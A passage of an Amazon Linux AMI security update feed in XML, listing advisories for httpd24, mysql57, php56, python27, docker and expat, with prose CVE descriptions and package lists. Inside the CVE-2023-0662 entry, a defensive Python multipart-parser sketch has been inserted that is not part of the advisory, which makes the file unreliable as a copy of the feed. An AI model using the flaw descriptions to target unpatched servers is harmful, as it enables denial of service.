arch="i686"><filename>Packages/python27-tools-2.7.18-2.148.amzn1.i686.rpm</filename></package><package 
name="python27-debuginfo" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.148.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.148.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1877</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1877: important priority package update for httpd24</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-45802:
Description
A flaw was found in mod_http2. When an HTTP/2 stream is reset (RST frame) by a client, there is a time window where the request's memory resources are not reclaimed immediately. Instead, de-allocation is deferred to connection close. A client could send new requests and resets, keeping the connection busy and open, causing the memory footprint to keep on growing. On connection close, all resources are reclaimed, but the process might run out of memory before connection close.
Statement
During "normal" HTTP/2 use, the probability of encountering this issue is very low. The kept memory would not become noticeable before the connection closes or times out.
Mitigation
Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
CVE-2023-43622:
A flaw was found in httpd. This flaw allows an attacker opening an HTTP/2 connection with an initial window size of 0 to block handling of that connection indefinitely in the Apache HTTP Server. This vulnerability can exhaust worker resources in the server, similar to the well-known "Slowloris" attack pattern.
CVE-2023-31122:
Out-of-bounds read vulnerability in mod_macro of Apache HTTP Server. This issue affects Apache HTTP Server through 2.4.57.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31122" title="" id="CVE-2023-31122" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43622" title="" id="CVE-2023-43622" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45802" title="" id="CVE-2023-45802" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ssl" version="2.4.58" release="1.101.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.58" release="1.101.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.58" release="1.101.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.58-1.101.amzn1.noarch.rpm</filename></package><package name="httpd24-tools" version="2.4.58" release="1.101.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/httpd24-tools-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.58" release="1.101.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.58" release="1.101.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.58-1.101.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1878</id><title>Amazon Linux AMI 
2014.03 - ALAS-2023-1878: medium priority package update for mysql57</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:57:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-22053:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Client programs). Supported versions that are affected are 5.7.42 and prior and 8.0.33 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DoS) of MySQL Server and unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22053" title="" id="CVE-2023-22053" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-common" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.43" release="1.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.43-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2023-1879</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1879: important priority package update for php56</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0662:
In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, excessive number of parts in HTTP form upload can cause high resource consumption and excessive number of log entries. This can cause denial of service on the affected server by exhausting CPU resources or disk space.
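The following Python sketch is an added example and is not PHP's code or part of the advisory. It shows the class of fix the CVE-2023-0662 description points at: a multipart/form-data parser that counts parts as it walks the body and rejects the request once a hard cap is exceeded, before doing any per-part header parsing, copying or logging. The cap of 1000 parts, the boundary string and the sample bodies are assumed for illustration.

```python
"""Bounded multipart/form-data parser (added example, not PHP's own code).

Counts parts while scanning the body and stops at a hard cap, so a body
with a huge number of tiny parts costs work proportional to the cap rather
than to the request size. Cap value and sample input are constructed here.
"""
import re

MAX_PARTS = 1000  # assumed limit for this example; real servers make it configurable


class TooManyParts(ValueError):
    """Raised when a body carries more parts than the configured cap."""


def parse_multipart(body: bytes, boundary: str, max_parts: int = MAX_PARTS) -> list:
    """Return a list of (field_name, payload) tuples for a multipart/form-data body.

    The part counter is checked before any header parsing or payload copying
    for that part, so an oversized body is rejected early.
    """
    delim = b"--" + boundary.encode("ascii")
    parts = []
    count = 0
    pos = body.find(delim)
    if pos == -1:
        raise ValueError("boundary not found in body")
    pos += len(delim)
    while True:
        # A trailing "--" right after the delimiter is the closing boundary.
        if body.startswith(b"--", pos):
            return parts
        count += 1
        if count > max_parts:
            raise TooManyParts(f"more than {max_parts} parts in request body")
        # Skip the CRLF that ends the delimiter line.
        if body.startswith(b"\r\n", pos):
            pos += 2
        nxt = body.find(delim, pos)
        if nxt == -1:
            raise ValueError("unterminated part")
        segment = body[pos:nxt]
        header_blob, sep, payload = segment.partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part without header/body separator")
        # Drop the CRLF that precedes the next delimiter.
        if payload.endswith(b"\r\n"):
            payload = payload[:-2]
        m = re.search(rb'name="([^"]*)"', header_blob)
        name = m.group(1).decode("utf-8", "replace") if m else ""
        parts.append((name, payload))
        pos = nxt + len(delim)


def build_body(boundary: str, n: int) -> bytes:
    """Construct a multipart body with n small text fields (sample input)."""
    chunks = []
    for i in range(n):
        chunks.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="f{i}"\r\n\r\n'
            f"v{i}\r\n".encode("ascii")
        )
    chunks.append(f"--{boundary}--\r\n".encode("ascii"))
    return b"".join(chunks)


def accepted_part_count(n: int, max_parts: int = MAX_PARTS) -> int:
    """Parse a constructed body with n parts; return the number accepted, or -1 if rejected."""
    try:
        return len(parse_multipart(build_body("XyZ", n), "XyZ", max_parts))
    except TooManyParts:
        return -1
```

The point of the structure is that the rejection happens on the part counter alone; a body with a million empty parts is refused after the cap is reached, and nothing about the remaining parts is parsed or written to a log.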
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0662" title="" id="CVE-2023-0662" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-mbstring" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-dba" 
version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.40" release="1.144.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-mssql-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-opcache" 
version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.40-1.144.amzn1.i686.rpm</filename></package><package 
name="php56-process" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.40" release="1.144.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-imap-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.40-1.144.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1880</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1880: important priority package update for python27</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 18:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48565:
An XML External Entity (XXE) issue was discovered in Python through 3.9.1. The plistlib module no longer accepts entity declarations in XML plist files to avoid XML vulnerabilities.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48565" title="" id="CVE-2022-48565" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-tools" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.149.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.149.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.149.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.149.amzn1.i686.rpm</filename></package><package 
name="python27-test" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.149.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.149.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1881</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1881: important priority package update for docker</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 18:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41723:
http2/hpack: avoid quadratic complexity in hpack decoding
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723" title="" id="CVE-2022-41723" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="20.10.13" release="3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-20.10.13-3.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="20.10.13" release="3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-20.10.13-3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1882</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1882: medium priority package update for expat</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23990:
Expat (aka libexpat) before 2.4.4 has an integer overflow in the doProlog function.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23990" title="" id="CVE-2022-23990" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-devel" version="2.1.0" release="15.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-15.34.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="15.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-15.34.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-15.34.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.34.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-15.34.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="15.34.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-15.34.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.34.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-15.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1883</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1883: important priority package update 